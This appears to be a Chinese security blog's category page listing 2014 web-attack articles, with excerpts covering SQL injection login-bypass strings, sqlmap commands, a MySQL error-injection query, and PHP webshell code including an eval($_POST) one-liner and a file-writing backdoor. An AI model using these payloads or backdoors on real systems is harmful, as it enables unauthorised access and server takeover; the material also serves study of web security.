web安全
文章平均质量分 80
shawnsec
这个作者很懒,什么都没留下…
展开
-
万能”的网站后台账号和密码!
虽说是万能,但是也不是全部网站都奏效,把账号和密码按照相同的代码输入进去即可。1:“or “a“=“a2: ‘)or(‘a‘=‘a3:or 1=1--4:‘or 1=1--5:a‘or‘ 1=1--6:“or 1=1--7:‘or‘a‘=‘a8:“or“=“a‘=‘a9:‘or‘‘=‘10:‘or‘=‘or‘11: 1 or ‘1‘=‘1‘=11原创 2014-06-11 14:34:16 · 7645 阅读 · 0 评论 -
Tomcat、Weblogic、JBoss、GlassFish、Resin、Websphere弱口令及拿webshell方法总结
1、java应用服务器 Java应用服务器主要为应用程序提供运行环境,为组件提供服务。Java 的应用服务器很多,从功能上分为两类:JSP 服务器和 Java EE 服务器。1.1 常见的Server概述 常见的Java服务器:Tomcat、Weblogic、JBoss、GlassFish、Jetty、Resin、IBM Websphere、Bejy Tiger、Gero转载 2014-11-17 15:42:02 · 5677 阅读 · 0 评论 -
Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!
0x00 背景最近大家都在玩Struts2的class.classLoader.官方在S-20的两漏洞,一个commons-fileupload造成的DoS,这个就是让cpu慢点,不打补丁觉得也无所谓.另外一个,就是class.classLoader允许对象赋值.看到大家总是在tomcat8上寻求利用,觉得很鸡肋(用户的应用更换Tomcat真没那么快),版本限制就是软肋.顿时,转载 2014-11-17 14:27:47 · 884 阅读 · 0 评论 -
攻击JavaWeb应用[3]-SQL注入[1]
注:本节重点在于让大家熟悉各种SQL注入在JAVA当中的表现,本想带点ORM框架实例,但是与其几乎无意,最近在学习MongoDb,挺有意思的,后面有机会给大家补充相关。0x00 JDBC和ORMJDBC:JDBC(Java Data Base Connectivity,java数据库连接)是一种用于执行SQL语句的Java API,可以为多种关系数据库提供统一访问。转载 2014-11-14 15:26:05 · 1811 阅读 · 0 评论 -
攻击JavaWeb应用[6]-程序架构与代码审计
注:不管多么强大的系统总会有那么些安全问题,影响小的可能仅仅只会影响用户体验,危害性大点的可能会让攻击者获取到服务器权限。这一节重点是怎样去找到并利用问题去获取一些有意思的东西。Before:有MM的地方就有江湖,有程序的地方就有漏洞。现在已经不是SQL注入漫天的年代了,Java的一些优秀的开源框架让其项目坚固了不少。在一个中大型的Web应用漏洞的似乎永远都存在,只是在于影转载 2014-11-14 15:24:50 · 1974 阅读 · 0 评论 -
攻击JavaWeb应用[9]-Server篇[2]
0x01 WebServerWeb服务器可以解析(handles)HTTP协议。当Web服务器接收到一个HTTP请求(request),会返回一个HTTP响应(response),例如送回一个HTML页面。Server篇其实还缺少了JBOSS和Jetty,本打算放到Server[2]写的。但是这次重点在于和大家分享B/S实现和交互技术。Server[1]已经给大家介绍了许多由J转载 2014-11-14 15:19:19 · 689 阅读 · 0 评论 -
攻击JavaWeb应用[7]-Server篇[1]
java应用服务器Java应用服务器主要为应用程序提供运行环境,为组件提供服务。Java 的应用服务器很多,从功能上分为两类:JSP 服务器和 Java EE 服务器。常见的Server概述常见的Java服务器:Tomcat、Weblogic、JBoss、GlassFish、Jetty、Resin、IBM Websphere、Bejy Tiger、Geronimo、Jo转载 2014-11-14 15:11:17 · 1974 阅读 · 0 评论 -
渗透中寻找突破口的那些事
0x00 寻找目标在自己日常检测中以及观察他人检测思路发现前期收集信息具有很关键的作用,很多时候不需要对某种漏洞有很深的研究,如果前期收集了足够多的目标,只需要检测一些常见的高危漏洞即可有收获常用思路1.网段信息1)通过子域名如果存在域传送这种漏洞是最好的,没有的话一般就要暴破子域名了我常用的软件为dnsmap,基本用法./dnsmap ta转载 2014-11-14 11:42:38 · 836 阅读 · 0 评论 -
攻击JavaWeb应用[2]-CS交互安全
注:本节意在让大家了解客户端和服务器端的一个交互的过程,我个人不喜欢xss,对xss知之甚少所以只能简要的讲解下。这一节主要包含HttpServletRequest、HttpServletResponse、session、cookie、HttpOnly和xss,文章是年前几天写的本应该是有续集的但年后就没什么时间去接着续写了。由于工作并非安全行业,所以写的并不算专业希望大家能够理解。后面的章节可能转载 2014-11-14 15:29:01 · 1028 阅读 · 0 评论 -
攻击JavaWeb应用[4]-SQL注入[2]
注:这一节主要是介绍Oracle和SQL注入工具相关,本应该是和前面的Mysql一起但是由于章节过长了没法看,所以就分开了。0x00 OracleOracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文公司的一款关系数据库管理系统。Oracle对于MYSQL、MSSQL来说意味着更大的数据量,更大的权限。这一次我们依旧使用上面的转载 2014-11-14 15:26:59 · 1322 阅读 · 0 评论 -
又一款超强PHP后门
$f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"];$c = $_POST["z2"];$buf = "";for ($i = 0; $i strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2));@fwrite(fopen($f, "w") , $buf);转载 2014-11-14 15:10:02 · 733 阅读 · 0 评论 -
攻击JavaWeb应用[8]-后门篇
0x00 背景关于JavaWeb后门问题一直以来都比较少,而比较新奇的后门更少。在这里我分享几种比较有意思的JavaWeb后门给大家玩。0x01 jspx后门在如今的web应用当中如果想直接传个jsp已经变得比较难了,但是如果只限制了asp、php、jsp、aspx等这些常见的后缀应该怎样去突破呢?我在读tomcat的配置文件的时候看到jsp和jspx都是由org.转载 2014-11-14 15:21:02 · 3248 阅读 · 0 评论 -
SQLMAP使用笔记
注入 分法不同,种类不同,先简单的分下类:1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x”获取数据库sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --dbs得到库名后获取表sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” -D 库名 --tables获取字原创 2014-08-14 12:43:15 · 393 阅读 · 0 评论 -
新型mysql报错注入
新型mysql报错注入,这种报错注入主要是基于mysql中无符号int数据类型的溢出:1.查询数据库版本:select 2*(if((select 8 from (select (version()))s),18446744073709551610, 18446744073709551610));=select 1E308*if((select * from (select version原创 2014-08-12 15:56:23 · 1214 阅读 · 0 评论 -
编辑器漏洞手册
简介#2014年8月21日最初的手册版本,是由北洋贱队的各位朋友收集整理。时隔4年,我们再次整理了这些文件。目的是希望这种传统能延续下去。我们相信:星星之火可以燎原。希望大家能多提建议,完善这份手册。#2010年某月某日创建这样一个文档是为了能够使得众多需要得到帮助的人们,在她们最为困苦之时找到为自己点亮的那盏明灯,虽然这将揭示了某个寂静黑夜下一群躁动不安的人群转载 2014-09-09 15:07:11 · 1532 阅读 · 0 评论 -
使用LCX进行内网端口转发
局域网中的某台计算机仅仅开放了Web服务,该服务仅能供内网用户使用,而外网用户根本没有办法直接访问。因此要想让外网用户能够访问局域网中的系统服务,这必须进行端口映射等操作才行。端口映射在入侵内网的时候经常用到,特别是要登陆远程终端服务时,使用端口映射就非常方便。Lcx.exe是一个端口转发工具,相当于ba转载 2014-08-11 16:47:23 · 10677 阅读 · 0 评论 -
搜索型注入
如果没有说错的话,在国内应该是lake2最早提出搜索型文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索型注入就是直接在文本框中输入and 1=1 和and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是转载 2014-08-21 14:38:55 · 378 阅读 · 0 评论 -
绕过WAF防火墙继续SQL注入常用方法
绕过WAF防火墙继续SQWeb Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过。WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招。那今天我在这里做个小小的扫盲吧。先来说说WAF bypass是啥。 WAF呢,简单说,它是一个Web应用程序防火墙,其功能呢是用于过滤某些恶意请求与某些关键字。WAF仅仅是一个工具,帮助你防护网站来的。但是转载 2014-06-23 09:17:32 · 2833 阅读 · 0 评论 -
php一句话后门分析
1.eval eval用法: eval() 函数把字符串按照 PHP 代码来计算 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 <?php eval ($_POST[jusker]); ?>2.assert Assert用法:转载 2014-12-05 08:51:47 · 1413 阅读 · 0 评论